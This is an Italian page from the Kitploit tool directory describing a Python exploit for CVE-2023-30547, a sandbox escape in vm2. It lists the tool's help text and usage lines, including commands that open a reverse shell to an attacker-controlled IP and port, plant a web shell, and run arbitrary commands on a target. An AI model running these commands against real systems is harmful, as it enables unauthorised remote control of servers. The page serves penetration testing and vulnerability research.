Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-30547 — Strumento per esplorare CVE-2023-30547 | Kitploit
Strumenti/GitHubGitHub/cur1iosity/cve-2023-30547
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubcur1iosity/cve-2023-30547

CVE-2023-30547

Strumento per esplorare CVE-2023-30547

Vedi Repository
12 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-30547

Dimostrazione

Descrizione della vulnerabilità

vm2 è una sandbox che può eseguire codice non attendibile con i moduli integrati di Node nella whitelist. Esiste una vulnerabilità nella sanitizzazione delle eccezioni di vm2 per le versioni fino alla 3.9.16, che consente agli aggressori di sollevare un'eccezione host non sanificata all'interno di handleException(), utilizzabile per evadere dalla sandbox ed eseguire codice arbitrario nel contesto dell'host.

CVE-2023-30547.py

Questo strumento è un semplice script Python che può essere utilizzato per esplorare la vulnerabilità. Ha 4 modalità:

  • check: verifica se il target è vulnerabile.
  • command_execution_execution: esegue un comando sul target.
  • web_shell: apre una web shell sul target.
  • reverse_shell: apre una reverse shell sul target.

Aiuto

root@kitploit:~
usage: CVE-2023-30547.py [-h] -m {check,command_execution,web_shell,reverse_shell} -t TARGET [-c COMMAND] [-p PORT] [-i IP]

Tool for exploring CVE-2023-30547. 

options:
  -h, --help            show this help message and exit
  -m {check,command_execution,web_shell,reverse_shell}, --mode {check,command_execution,web_shell,reverse_shell}
                        Mode to run the tool in.
  -t TARGET, --target TARGET
                        Target to run the tool against.
  -c COMMAND, --command COMMAND
                        Command to execute in exploit mode.
  -p PORT, --port PORT  Local port to use for reverse shell.
  -i IP, --ip IP        Local ip to use for reverse shell.

Utilizzo

root@kitploit:~
python3 CVE-2023-30547.py -m check -t http://url.com/run
python3 CVE-2023-30547.py -m reverse_shell -t domain.com/run -p 1234 -i 10.10.10.10
python3 CVE-2023-30547.py -m web_shell -t domain.com/run
python3 CVE-2023-30547.py -m command_execution -t domain.com -c 'whoami'

Riferimenti:

  • https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244
  • https://nvd.nist.gov/vuln/detail/CVE-2023-30547
Scarica lo strumento